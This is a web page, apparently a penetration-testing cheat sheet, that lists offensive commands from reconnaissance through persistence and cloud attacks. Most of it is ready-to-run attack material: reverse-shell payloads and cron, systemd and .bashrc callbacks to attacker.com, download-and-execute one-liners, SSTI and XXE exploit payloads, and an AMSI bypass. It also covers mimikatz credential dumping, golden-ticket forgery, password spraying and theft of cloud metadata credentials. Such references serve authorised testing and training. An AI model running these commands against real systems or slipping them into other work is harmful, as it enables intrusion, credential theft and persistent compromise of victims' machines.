Passive subdomain discovery via multiple APIs (VT, Shodan, C99, etc.)
subfinder -d target.com -all -recursive -o subs.txtPentest Cheat Sheet
159 commands across 13 phases — from first recon to persistence. Press / to search.
No commands match your search.
Recon
Passive & active asset discoveryOWASP Amass passive mode — no direct DNS queries to target
amass enum -passive -d target.com -o amass-passive.txtFast subdomain discovery using certificate transparency and APIs
assetfinder --subs-only target.com | tee subs-asset.txtGather emails, subdomains, IPs, employee names across all sources
theHarvester -d target.com -b all -f harvester-outPull subdomains from public certificate logs — no auth required
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u | tee crtsh.txtRegistrar, nameservers, abuse contacts, registration dates
whois target.com
whois 1.2.3.4Pull all DNS record types: A, NS, MX, TXT, SOA, CNAME
dig target.com ANY +noall +answer
dig target.com NS +short
dig target.com MX +short
dig target.com TXT +short
dig @8.8.8.8 target.com A +shortAttempt full zone transfer — exposes all records if misconfigured
dig axfr @ns1.target.com target.comStandard DNS enum then brute-force subdomains with wordlist
dnsrecon -d target.com -t std
dnsrecon -d target.com -t brt -D /usr/share/seclists/Discovery/DNS/namelist.txtFind exposed services, open ports and banners via Shodan
shodan domain target.com
shodan host 1.2.3.4
shodan search "ssl.cert.subject.cn:target.com" --fields ip_str,port,orgRequires SHODAN_API_KEY in env
Get all URLs from Wayback, URLScan, OTX — includes old endpoints
gau --threads 5 target.com | tee urls-gau.txt
gau --subs target.com | grep -v '\.css\|\.js\|\.png\|\.jpg' | tee urls-filtered.txtPull URLs from Wayback Machine and filter for server-side scripts
waybackurls target.com | tee wayback.txt
cat wayback.txt | grep '\.php\|\.asp\|\.aspx\|\.jsp' | sort -uFind exposed files, admin panels and indexed sensitive content
site:target.com filetype:pdf
site:target.com inurl:admin
site:target.com ext:php intitle:index
site:target.com -www
"@target.com" filetype:xlsFind leaked API keys, tokens and credentials in public repos
trufflehog github --org=targetorg --only-verified
trufflehog git https://github.com/targetorg/repo --only-verifiedActive DNS brute-force — resolves and returns live subdomains
dnsx -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -resp -o dnsx-out.txt
cat subs.txt | dnsx -resp -a -cnameICMP + ARP sweep to find live hosts on a subnet
nmap -sn 192.168.1.0/24 --open -oG hosts-alive.txt
nmap -sn 192.168.1.0/24 | grep "Nmap scan" | awk '{print $NF}'Fast ICMP sweep — faster than nmap for large ranges
fping -ag 192.168.1.0/24 2>/dev/null | tee alive-hosts.txtFind all IP ranges owned by a company via ASN lookup
curl -s "https://api.bgpview.io/search?query_term=target.com" | jq '.data.asns[].asn'
whois -h whois.radb.net -- '-i origin AS12345' | grep ^routeScanning
Port, service & web host discoveryAll 65535 TCP ports, fast rate — good first pass
nmap -p- --min-rate 5000 -T4 target.com -oN nmap-allports.txtVersion detection + default NSE scripts on specific open ports
nmap -sV -sC -p 22,80,443,3389 target.com -oN nmap-services.txtOS detection, version, scripts and traceroute in one pass
nmap -A -T4 target.com -oN nmap-aggressive.txtNoisy — avoid on evasive engagements
Common UDP services: SNMP (161), DNS (53), NTP (123), TFTP (69)
nmap -sU --top-ports 100 target.com -oN nmap-udp.txtRequires root/sudo
Check for MS17-010 (EternalBlue), MS08-067, SMBGhost and enumerate shares
nmap --script smb-vuln* -p 445 target.com
nmap --script smb-enum-shares,smb-enum-users -p 445 target.comFastest raw port scanner — sweeps entire ranges in seconds
masscan -p1-65535 10.0.0.0/24 --rate=10000 -oL masscan-out.txt
masscan -p80,443,8080,8443 10.0.0.0/24 --rate=50000Requires root — use lower rate in shared environments
Finds open ports in seconds then pipes directly to nmap for service scan
rustscan -a target.com --ulimit 5000 -- -sV -sC
rustscan -a 10.0.0.0/24 -r 1-65535 --ulimit 5000 -- -sVProbe HTTP/HTTPS on all subdomains — detect tech, status, redirects
cat subs.txt | httpx -title -tech-detect -status-code -o httpx-out.txt
httpx -l subs.txt -follow-redirects -status-code -title -server -td -mc 200,301,302,403Fast SYN port scanner from ProjectDiscovery — pairs well with httpx
naabu -host target.com -p - -o naabu-ports.txt
cat subs.txt | naabu -top-ports 1000 -o naabu-out.txtScreenshot every live web target and generate browsable HTML report
gowitness scan file -f web-alive.txt --write-db
gowitness scan single -u https://target.com
gowitness report generateWeb Enum
Directory, parameter & technology discoveryFast directory brute-force — auto-calibrates to filter false positives
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -u https://target.com/FUZZ -ac -o ffuf-dirs.jsonDiscover backup files, config leaks, server-side scripts by extension
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -u https://target.com/FUZZ -e .php,.asp,.aspx,.bak,.txt,.xml,.config -acFind virtual hosts not exposed in DNS — common in internal apps
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u https://target.com -H "Host: FUZZ.target.com" -ac -fs 0Discover hidden GET parameters — entry point for injection attacks
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u "https://target.com/page?FUZZ=test" -ac
ffuf -w params.txt -u "https://target.com/page?FUZZ=test" -ac -fs 0Fuzz POST body parameters for hidden inputs
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u https://target.com/api/endpoint -X POST -d "FUZZ=test" -H "Content-Type: application/x-www-form-urlencoded" -acClassic directory enum with extension support
gobuster dir -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,asp,aspx -t 50 -o gobuster-dirs.txtBrute-force DNS subdomains via direct resolution
gobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50 -o gobuster-dns.txtAuto-recurses into discovered directories — catches deeper paths
feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt --depth 3 --auto-tune -o ferox-out.txtQuick scan for misconfigs, dangerous files, outdated software
nikto -h https://target.com -o nikto-out.txt -Format txt
nikto -h https://target.com -Tuning 4Noisy — easily detected by WAF/IDS
Identify CMS, frameworks, server versions, JS libraries
whatweb -a 3 https://target.com
whatweb -i targets.txt --log-json whatweb-out.jsonDetect and identify Web Application Firewalls before attacking
wafw00f https://target.com
wafw00f -l # list known WAFsTemplate-based scanner — covers CVEs, misconfigs, exposed panels
nuclei -u https://target.com -t ~/nuclei-templates/ -severity critical,high -o nuclei-out.txt
nuclei -l web-alive.txt -t ~/nuclei-templates/cves/ -rate-limit 50Find API keys, tokens and endpoints hardcoded in JavaScript files
trufflehog filesystem /path/to/js/ --only-verified
gau target.com | grep '\.js$' | httpx -sr -o js-files.txtCheck if server reflects arbitrary Origin — CORS misconfiguration
curl -s -I -H "Origin: https://evil.com" https://target.com/api/data | grep -i 'access-control'Service Enum
SMB, LDAP, Kerberos, SNMP and moreEnumerate users, groups, shares, password policy — null session first
enum4linux-ng -A target.com -oY enum4linux-out.yamlNull / guest session share enum — relay-list finds SMB-signing disabled hosts
nxc smb target.com -u '' -p '' --shares
nxc smb target.com -u guest -p '' --shares
nxc smb 192.168.1.0/24 --gen-relay-list relay-targets.txtList and browse SMB shares manually
smbclient -L //target.com -N
smbclient //target.com/SHARE -N
smbclient //target.com/SHARE -U "domain\user%password"Download entire share contents recursively
smbclient //target.com/SHARE -U "user%password" -c "recurse; prompt; mget *"Anonymous LDAP query — gets naming contexts and user attributes
ldapsearch -x -H ldap://target.com -b '' -s base '(objectclass=*)' namingContexts
ldapsearch -x -H ldap://target.com -b 'DC=domain,DC=com' '(objectClass=user)' sAMAccountName mailFull AD LDAP dump — outputs HTML/JSON files for all objects
ldapdomaindump -u 'domain\user' -p 'password' ldap://dc.target.com -o ldap-dump/Query Domain Admins, unconstrained delegation, and custom filters
windapsearch -d target.com -u user@target.com -p password --da
windapsearch -d target.com -u user@target.com -p password --unconstrained-usersEnumerate valid AD users via Kerberos pre-auth errors — no lockout
kerbrute userenum -d target.com --dc dc.target.com /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -o kerbrute-users.txtValid username = AS-REQ response code differs from invalid
Single password against all users — respects lockout policy via Kerberos
kerbrute passwordspray -d target.com --dc dc.target.com users.txt 'Password2024!'One password at a time to stay below lockout threshold
Brute community strings then walk MIB tree for configs, users, routes
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com
snmpwalk -v2c -c public target.comCheck SSH server for weak algorithms, outdated KEX, and misconfigs
ssh-audit target.comCheck RDP for NLA, encryption level, pre-auth DoS vulnerabilities
rdp-sec-check target.com:3389List and mount NFS exports — often world-readable
showmount -e target.com
mount -t nfs target.com:/share /mnt/nfs -o nolockNo-squash exports allow UID spoofing for root file access
Enumerate valid mail users via VRFY/EXPN/RCPT TO commands
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t target.com -p 25Test for publicly exposed database — default or weak credentials
mysql -h target.com -u root -p
nxc mssql target.com -u users.txt -p passwords.txtInitial Access
Exploitation, password attacks & web vulnsAuto-detect and exploit SQLi — enumerate DBs, tables, dump data
sqlmap -u "https://target.com/page?id=1" --batch --dbs
sqlmap -u "https://target.com/page?id=1" --batch -D dbname --tables
sqlmap -u "https://target.com/page?id=1" --batch -D dbname -T users --dumpUse saved Burp request — handles cookies, CSRF tokens automatically
sqlmap -r request.txt --batch --dbs --level 5 --risk 3
sqlmap -r request.txt --batch --os-shell # attempt OS shell if DBASpray credentials across SMB — continue-on-success avoids stopping at first hit
nxc smb dc.target.com -u users.txt -p passwords.txt --continue-on-success
nxc smb dc.target.com -u users.txt -p 'Password123!' --continue-on-successMonitor lockout policy — default is 5 attempts / 30 min
Brute-force SSH login — -t 4 keeps it under most rate limits
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target.com -t 4
hydra -L users.txt -P passwords.txt ssh://target.com -t 4 -o hydra-ssh.txtBrute-force web login form — customize fail string to match app response
hydra -l admin -P rockyou.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials" -t 20Credential stuffing/spraying on web forms using ffuf cluster bomb mode
ffuf -w users.txt:USER -w passwords.txt:PASS -u https://target.com/login -X POST -d "username=USER&password=PASS" -H "Content-Type: application/x-www-form-urlencoded" -fc 302 -mode clusterbombTest for Local File Inclusion — read /etc/passwd, /proc/self/environ
ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u "https://target.com/page?file=FUZZ" -ac
curl "https://target.com/page?file=../../../../etc/passwd"Test for SSRF — detect out-of-band DNS/HTTP callbacks to your server
# Use Burp Collaborator or interactsh:
curl "https://target.com/fetch?url=https://YOUR.interactsh.com/ssrf"
interactsh-client # listen for callbacksXML External Entity — read local files or trigger OOB DNS/HTTP
# Inject into XML body:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
# Blind XXE via OOB (interactsh):
<!DOCTYPE root [<!ENTITY % ext SYSTEM "http://YOUR.interactsh.com/xxe"> %ext;]>Try Content-Type: application/xml and text/xml — some parsers differ
Server-Side Template Injection — probe with math expressions, escalate to RCE
# Detection — inject into all input fields:
{{7*7}} # Jinja2/Twig → 49
49 # Freemarker → 49
<%= 7*7 %> # ERB → 49
# Jinja2 RCE:
{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}
# Twig RCE:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}Enumerate GraphQL schema, find hidden fields and test batch query abuse
# Introspection query (disable check in prod = misconfiguration):
curl -X POST https://target.com/graphql -H "Content-Type: application/json" \
-d '{"query":"{__schema{types{name fields{name}}}}"}'
# Tools:
graphw00f -f -t https://target.com/graphql # fingerprint engine
clairvoyance -u https://target.com/graphql -o schema.json # wordlist-based introspection
# Batch query abuse (DoS / auth bypass):
[{"query":"query{user(id:1){email}}"},{"query":"query{user(id:2){email}}"}]Test for default credentials on admin panels, routers, dev tools
nuclei -u https://target.com -t ~/nuclei-templates/default-logins/ -o default-creds.txt
nuclei -l web-alive.txt -t ~/nuclei-templates/default-logins/Find and run exploits in Metasploit — rank:excellent = reliable/stable
msfconsole -q
search type:exploit platform:windows rank:excellent cve:2021
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target.com
set LHOST attacker.com
runGenerate staged/stageless reverse shells for multiple platforms
# Linux ELF:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=attacker.com LPORT=4444 -f elf > shell.elf
# Windows EXE:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker.com LPORT=4444 -f exe > shell.exe
# PHP:
msfvenom -p php/reverse_php LHOST=attacker.com LPORT=4444 -f raw > shell.phpSimple listener + PTY upgrade for interactive shell
nc -lvnp 4444
# Upgrade to PTY after catching:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Then: Ctrl+Z → stty raw -echo; fg → export TERM=xtermLinux Privesc
Privilege escalation on Linux systemsEstablish who you are, where you are, and what OS version is running
id && whoami && hostname && uname -a
cat /etc/os-release
ip a; ip route; cat /etc/hosts
env; cat /proc/versionFind all interactive users — /etc/shadow if you have elevated read
cat /etc/passwd | grep -v nologin | grep -v false
cat /etc/shadow # requires root
getent passwd | awk -F: '$3 >= 1000' # human usersMost comprehensive Linux privesc script — outputs colour-coded findings
# Transfer and run:
python3 -m http.server 8080 # on attacker
curl http://attacker.com:8080/linpeas.sh | sh
# Or save output:
wget http://attacker.com:8080/linpeas.sh -O /tmp/lp.sh && chmod +x /tmp/lp.sh && /tmp/lp.sh | tee /tmp/lp-out.txtFind SUID binaries — compare against GTFOBins for exploitation paths
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Check each hit at: https://gtfobins.github.ioList sudo rights — any NOPASSWD binary may lead to root via GTFOBins
sudo -l
# Common exploitable entries:
# (ALL) NOPASSWD: /usr/bin/find → sudo find . -exec /bin/sh \; -quit
# (ALL) NOPASSWD: /usr/bin/vim → sudo vim -c ':!/bin/sh'
# (ALL) NOPASSWD: /usr/bin/python3 → sudo python3 -c 'import os; os.system("/bin/sh")'Find cron jobs executing scripts you can modify
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
find / -name "*.sh" -perm -002 2>/dev/null # world-writable scriptsFind binaries with dangerous capabilities — cap_setuid means instant root
getcap -r / 2>/dev/null
# cap_setuid+ep on python/perl/ruby/node = trivial root:
# /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'Write a new root-level user directly to /etc/passwd
ls -la /etc/passwd
# If writable:
openssl passwd -1 -salt hive hacked123
echo 'hive:$1$hive$...:0:0:root:/root:/bin/bash' >> /etc/passwd
su hiveDocker group membership = root — mount host root FS into container
id # check for docker group
docker run -v /:/mnt --rm -it alpine chroot /mnt shEscape --privileged container by mounting host block device
# Detect: cat /proc/1/status | grep CapEff → non-zero high bits
fdisk -l
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/hostGrep config files for hardcoded credentials
grep -rni "password\|passwd\|pwd\|secret\|token\|api_key" /var/www/ /etc/ /home/ 2>/dev/null | grep -v ".pyc\|Binary"
find / -name "*.conf" -o -name "*.config" -o -name "*.ini" -o -name ".env" 2>/dev/null | xargs grep -l "password" 2>/dev/nullHistory often contains passwords, SSH keys unlock lateral movement
cat ~/.bash_history
cat ~/.zsh_history
find / -name "id_rsa" -o -name "id_ecdsa" -o -name "*.pem" 2>/dev/null
cat ~/.ssh/known_hosts # discover internal hostsWindows Privesc
Privilege escalation on Windows systemsEstablish user context, privileges, network config and local admins
whoami /all
systeminfo
ipconfig /all
net user
net localgroup administrators
net shareWinPEAS = Windows equivalent of linpeas — covers all common vectors
# Transfer via certutil:
certutil -urlcache -f http://attacker.com/winPEASx64.exe C:\Windows\Temp\wp.exe
C:\Windows\Temp\wp.exe
# PowerShell:
iex(new-object net.webclient).downloadstring('http://attacker.com/winPEASPS.ps1')SeImpersonatePrivilege on service accounts = reliable SYSTEM escalation
whoami /priv # look for SeImpersonatePrivilege
# PrintSpoofer (Windows 10/Server 2019+):
PrintSpoofer64.exe -i -c cmd
# GodPotato (works on Win10/11/Server 2016-2022):
GodPotato.exe -cmd "cmd /c whoami"
# RoguePotato (older systems):
RoguePotato.exe -r 192.168.1.100 -e "cmd.exe" -l 9999Unquoted paths with spaces allow DLL/binary hijacking in intermediate directories
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v "\""
sc qc "VulnerableServiceName"Modify service binary path if you have SERVICE_ALL_ACCESS or WRITE_DAC
# PowerSploit / PowerView:
Get-ServiceAcl -Name VulnerableService | Format-List
# Accesschk:
accesschk64.exe -uwcqv "Authenticated Users" * /accepteula
accesschk64.exe -uwcqv * /accepteula 2>nul | findstr "SERVICE_ALL_ACCESS"If both registry keys = 1, any MSI installs as SYSTEM
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Both = 1: generate and run malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker.com LPORT=4444 -f msi > shell.msi
msiexec /quiet /qn /i shell.msiSave and exfiltrate SAM hive — extract local NTLM hashes offline
reg save HKLM\SAM C:\Temp\sam.save
reg save HKLM\SYSTEM C:\Temp\system.save
reg save HKLM\SECURITY C:\Temp\security.save
# On attacker:
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCALRequires admin/SYSTEM — Volume Shadow Copy bypass if VSS available
Deep diveDump plaintext passwords, NTLM hashes and Kerberos tickets from memory
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets
lsadump::sam
lsadump::dcsync /user:domain\krbtgtRequires SeDebugPrivilege — trigger: privilege::debug. Blocked by Credential Guard
Deep diveDisable AMSI in current PS session — run before loading offensive scripts
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)One-liner — modern EDR may detect the string. Obfuscate if needed
Execution policy is not a security boundary — trivial to bypass
powershell -ExecutionPolicy Bypass -File script.ps1
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
iex(new-object net.webclient).downloadstring('http://attacker.com/script.ps1')Hunt for credentials in files, saved cmdkey entries and PS history
dir /s /b C:\*.txt C:\*.xml C:\*.ini 2>nul | findstr /i "pass"
cmdkey /list
type C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Windows\Panther\Unattend.xml 2>nul
type C:\Windows\system32\sysprep\sysprep.xml 2>nulTransfer tools to the target without SMB — works through web proxies
# certutil:
certutil -urlcache -f http://attacker.com/file.exe C:\Windows\Temp\file.exe
# PowerShell:
(New-Object Net.WebClient).DownloadFile('http://attacker.com/file.exe','C:\Temp\file.exe')
# Invoke-WebRequest:
iwr http://attacker.com/file.exe -OutFile C:\Temp\file.exeActive Directory
AD enumeration, Kerberos attacks & ACL abuseCollect full AD data — feed ZIP into BloodHound for attack path analysis
# Windows (SharpHound):
.\SharpHound.exe -c All --zipfilename bh-collect.zip
# Linux (bloodhound-python):
bloodhound-python -u user -p 'password' -d target.com -dc dc.target.com -c All -ns dc-ip --zipPowerView covers everything BloodHound misses — run Find-LocalAdminAccess first
Import-Module .\PowerView.ps1
Get-NetDomain
Get-DomainUser | select samaccountname,description,pwdlastset
Get-DomainGroupMember -Identity "Domain Admins"
Get-DomainComputer | select name,operatingsystem
Find-LocalAdminAccess -VerboseFind-LocalAdminAccess scans entire domain — noisy but high-value
Request TGS for SPNs and crack offline — targets service accounts
# Linux:
impacket-GetUserSPNs -request -dc-ip dc-ip 'domain/user:password' -outputfile kerberoast.hashes
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt --force
# Windows:
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -Expand Hash > kerberoast.txtRC4 encrypted tickets are faster to crack than AES-256 — check etype
Deep diveExploit accounts with "Do not require Kerberos pre-authentication" enabled
impacket-GetNPUsers -usersfile users.txt -no-pass -dc-ip dc-ip 'domain/' -format hashcat -outputfile asrep.hashes
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txtSimulate DC replication to pull all NTLM hashes — needs DS-Replication rights
# Linux:
impacket-secretsdump -just-dc-ntlm 'domain/user:password@dc-ip'
impacket-secretsdump -just-dc-ntlm -just-dc-user krbtgt 'domain/user:password@dc-ip'
# Windows (mimikatz):
lsadump::dcsync /domain:target.com /user:AdministratorRequires: Domain Admin, EXCHANGE WINDOWS PERMISSIONS, or explicit DCSync ACL
Authenticate with NTLM hash directly — no plaintext password needed
impacket-psexec -hashes :NTLM_HASH administrator@target.com
evil-winrm -i target.com -u administrator -H NTLM_HASH
nxc smb target.com -u administrator -H NTLM_HASH --exec-method mmcexec -x "whoami"Inject Kerberos ticket into session — bypasses NTLM hash requirement
# Export tickets (mimikatz):
sekurlsa::tickets /export
kerberos::ptt ticket.kirbi
# Linux:
export KRB5CCNAME=/path/to/ticket.ccache
impacket-psexec -k -no-pass target.comForge TGT with krbtgt hash — persistent domain access, survives password resets
# Requires: krbtgt NTLM hash + domain SID
# mimikatz:
kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-XXX /krbtgt:HASH /ptt
# Linux:
impacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-XXX -domain target.com Administrator
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass dc.target.comESC1: enroll in template with SAN and impersonate any user including DA
certipy find -u user@target.com -p 'password' -dc-ip dc-ip -vulnerable
certipy req -u user@target.com -p 'password' -dc-ip dc-ip -target ca.target.com -ca 'CA-NAME' -template VulnTemplate -upn administrator@target.com
certipy auth -pfx administrator.pfx -domain target.com -dc-ip dc-ipESC8: relay DC NTLM auth to AD CS HTTP endpoint — get DC certificate
certipy relay -target ca.target.com -template DomainController
# Trigger auth with PetitPotam:
python3 PetitPotam.py -u user -p password attacker.com dc.target.comAbuse ACL edges from BloodHound — WriteDACL/GenericAll are direct paths to DA
# Add DCSync rights to user via WriteDACL on domain object (PowerView):
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=com" -PrincipalIdentity owned-user -Rights DCSync
# Grant GenericAll on target user to reset password:
Set-DomainUserPassword -Identity target-user -AccountPassword (ConvertTo-SecureString "NewPass123!" -AsPlainText -Force)Abuse S4U2Proxy to impersonate any user to allowed services
# Find accounts with constrained delegation:
Get-DomainComputer -TrustedToAuth | select name,msds-allowedtodelegateto
# Request ST for alternative user (S4U2Self + S4U2Proxy):
impacket-getST -spn 'cifs/target.domain.com' -impersonate Administrator 'domain/svc-account:password'
export KRB5CCNAME=Administrator@cifs_target.ccache
impacket-psexec -k -no-pass target.domain.comRelay NTLM auth to SMB signing-disabled hosts — works on flat networks
# Disable SMB/HTTP in Responder.conf first, then:
responder -I eth0 -rdw
impacket-ntlmrelayx -tf relay-targets.txt -smb2support -i # interactive shell
# Or dump SAM on relay targets:
impacket-ntlmrelayx -tf relay-targets.txt -smb2supportUse --gen-relay-list with nxc to find SMB signing disabled targets first
Deep diveLateral Movement
Remote execution, tunneling & pivotingRemote SYSTEM shell via SMB service — creates a noisy service entry
impacket-psexec 'domain/user:password@target.com'
impacket-psexec -hashes ':NTLM' 'domain/administrator@target.com'Creates PSEXESVC service — detected by most EDR. Use wmiexec for stealth
Remote execution via WMI — no service created, semi-interactive shell
impacket-wmiexec 'domain/user:password@target.com'
impacket-wmiexec -hashes ':NTLM' 'domain/administrator@target.com' "cmd.exe /c whoami"Full interactive PowerShell over WinRM — supports upload/download/load
evil-winrm -i target.com -u administrator -p 'password'
evil-winrm -i target.com -u administrator -H NTLM_HASH
evil-winrm -i target.com -u administrator -p 'password' -S # SSL (5986)Execute commands over SMB or WinRM — supports PTH with -H flag
nxc smb target.com -u admin -p 'password' -x "whoami"
nxc smb target.com -u admin -p 'password' -X "Get-Process" # PowerShell
nxc winrm target.com -u admin -p 'password' -x "whoami"Reach internal services through SSH jump hosts via local port forwarding
# Forward local port to internal RDP through jump host:
ssh -L 3389:internal-rdp:3389 user@jumphost -N
# Then: rdesktop localhost:3389
# Multi-hop:
ssh -J user@hop1 user@hop2SOCKS5 proxy through SSH — route any tool through the tunnel with proxychains
ssh -D 1080 user@jumphost -N
# Use with proxychains:
proxychains nmap -sT -p 80,443,445,3389 internal-host
proxychains evil-winrm -i internal-target -u admin -H HASHHTTP-based tunnel — works through proxies and firewalls that block TCP
# Attacker (server):
./chisel server -p 8080 --reverse
# Victim (client):
./chisel client attacker.com:8080 R:socks
# Single port forward:
./chisel client attacker.com:8080 R:3389:127.0.0.1:3389
# proxychains config: socks5 127.0.0.1 1080Layer 3 tunnel — use standard tools (nmap, nxc) without proxychains
# Attacker (proxy):
./proxy -selfcert -laddr 0.0.0.0:11601
# Victim (agent):
./agent -connect attacker.com:11601 -ignore-cert
# In ligolo console:
session → start
# Add route on attacker:
sudo ip route add 192.168.2.0/24 dev ligoloBest pivoting tool currently — no proxychains needed, full TCP/UDP support
DCOM execution — less noisy than PSExec, uses DCOM interface on port 135
# PowerShell — MMC20.Application:
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","target.com"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami > C:\Temp\out.txt","7")
# impacket:
impacket-dcomexec 'domain/user:password@target.com' 'cmd.exe /c whoami'Persistence
Maintain access across reboots & sessionsCron calls back every 5 minutes — survives reboots
(crontab -l 2>/dev/null; echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'") | crontab -
# System-wide (root required):
echo "*/5 * * * * root /tmp/.update.sh" >> /etc/crontabPersistent service that auto-restarts — survives reboots and killed sessions
cat > /etc/systemd/system/sysupdate.service << 'EOF'
[Unit]
Description=System Update Service
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
Restart=always
RestartSec=30
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload && systemctl enable sysupdate --nowBackdoor SSH access with your public key — clean and reliable
mkdir -p ~/.ssh && chmod 700 ~/.ssh
echo "ssh-rsa AAAA...your-public-key..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keysFires when user opens a shell — low persistence, trips on interactive logins
echo 'bash -i >& /dev/tcp/attacker.com/4444 0>&1 &' >> ~/.bashrc
echo 'nohup /tmp/.agent &' >> ~/.profileClassic autorun — executes payload on every user login
# Current user (no admin needed):
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "C:\Windows\Temp\payload.exe" /f
# All users (admin required):
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "C:\Windows\Temp\payload.exe" /fScheduled task running as SYSTEM every 5 minutes — survives reboots
schtasks /create /sc MINUTE /mo 5 /tn "Windows Update Helper" /tr "C:\Windows\Temp\payload.exe" /ru SYSTEM /f
schtasks /query /tn "Windows Update Helper"
# Delete:
schtasks /delete /tn "Windows Update Helper" /fPersistent service that auto-starts on boot — visible in services.msc
sc create SvcUpdate binPath= "C:\Windows\Temp\payload.exe" start= auto DisplayName= "Windows Service Update"
sc description SvcUpdate "Provides Windows update functionality."
sc start SvcUpdateFileless WMI persistence — triggers 2 min after boot, survives AV scans
# PowerShell:
$FilterArgs = @{Name='UpdateFilter'; EventNameSpace='root\CimV2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 120"}
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $FilterArgs
$ConsumerArgs = @{Name='UpdateConsumer'; CommandLineTemplate="C:\Windows\Temp\payload.exe"}
$Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments $ConsumerArgs
$BindingArgs = @{Filter=$Filter; Consumer=$Consumer}
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments $BindingArgsStealthy — no obvious registry key or service entry
Cloud
AWS, Azure & GCP enumeration and attacksEstablish who you are and what policies are attached — always run first
aws sts get-caller-identity
aws iam get-user
aws iam list-attached-user-policies --user-name <user>
aws iam list-user-policies --user-name <user>
aws iam list-groups-for-user --user-name <user>Brute-force all API calls to find what permissions a key actually has
git clone https://github.com/andresriancho/enumerate-iam
cd enumerate-iam
python3 enumerate-iam.py --access-key AKIA... --secret-key SECRET...Generates hundreds of API calls — visible in CloudTrail
List and access S3 buckets — try --no-sign-request for unauthenticated access
# List buckets:
aws s3 ls
aws s3 ls s3://bucket-name --recursive
# Public bucket check:
aws s3 ls s3://bucket-name --no-sign-request
# Download entire bucket:
aws s3 sync s3://bucket-name ./local-dir --no-sign-request
# Tool:
s3scanner scan --buckets-file buckets.txtFrom SSRF or code execution on EC2 — steal temporary IAM credentials
# IMDSv1 (no token required — misconfigured):
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME
# IMDSv2 (token required):
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/Stolen credentials: export AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY / AWS_SESSION_TOKEN
Deep divePacu is the AWS exploitation framework — scans for all privesc paths
pip3 install pacu
pacu
# In Pacu console:
set_keys
